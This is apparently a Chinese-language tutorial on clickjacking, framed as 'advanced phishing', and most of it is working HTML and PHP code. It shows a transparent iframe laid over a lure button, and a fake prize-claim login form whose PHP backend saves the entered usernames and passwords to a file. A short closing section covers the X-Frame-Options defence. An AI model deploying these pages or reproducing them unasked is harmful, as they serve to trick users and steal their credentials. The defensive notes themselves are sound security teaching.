攻击方法
作用:钓鱼进阶
iframe伪造源码
伪造①
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<head>
<title>点劫持POC</title>
<style>
iframe { width: 1440px; height: 900px; position: absolute; top: -0px; left: -0px; z-index: 2; -moz-opacity: 0; opacity: 0; filter: alpha(opacity=0); }
button { position: absolute; top: 250px; left: 770px; z-index: 1; width: 80px; height:20px; }
</style>
</head>
<body>
<button>脱掉衣服</button>
<img src="https://recomm.cnblogs.com/images/logo.png">
<iframe src="https://www.baidu.com/" scrolling="no"></iframe>#使用 iframe 嵌入被劫持的页面
</body>
</html>
伪造方法②
1.构造login.php
<html>
<head></head>
<body>
<form action="login.php" method="post">
<fieldset>
<legend>用户登录</legend>
<ul>
<li> <label>用户名:</label> <input type="text" name="username" /> </li>
<li> <label>密 码:</label> <input type="password" name="password" /> </li>
<li> <label> </label> <input type="submit" name="login" value="登录" /> </li>
</ul>
</fieldset>
</form>
<!--?php
//简单处理 header('Content-type:text/html; charset=utf-8'); // 处理用户登录信息 if (isset($_POST['login'])) { # 接收用户的登录信息 $username = trim($_POST['username']); $password = trim($_POST['password']); // 判断提交的登录信息 if (($username != '') || ($password != '')) { $myfile = fopen("newfile.txt","w"); $txt = $username." ".$password; fwrite($myfile,$txt); fclose($myfile); } }?-->
</body>
</html>
2.构造iframe进行劫持(改opacity进行调整是否覆盖页面)
<html>
<head></head>
<body>
<style>iframe{ width: 1440px; height: 900px; position: absolute; top: -0px; left: -0px; z-index: 2; opacity: 0; }</style>
<form action="/" method="post">
<fieldset>
<legend>中奖礼品领取,请先输入账号密码确认身份</legend>
<ul>
<li> <label>用户名:</label> <input type="text" name="username" /> </li>
<li> <label>密 码:</label> <input type="password" name="password" /> </li>
<li> <label> </label> <input type="submit" name="login" value="确认身份" /> </li>
</ul>
</fieldset>
</form>
<iframe src="http://127.0.0.1/login.php"></iframe>
</body>
</html>
防御方法
①服务器
DENY:浏览器会拒绝当前页面加载任何frame页面
SAMEORIGIN:frame页面的地址只能为同源域名下的页面
ALLOW-FROM origin:允许frame加载的页面地址
#php中设置
header("X-FRAME-OPTIONS:DENY");
②客户端
防止script弹出实现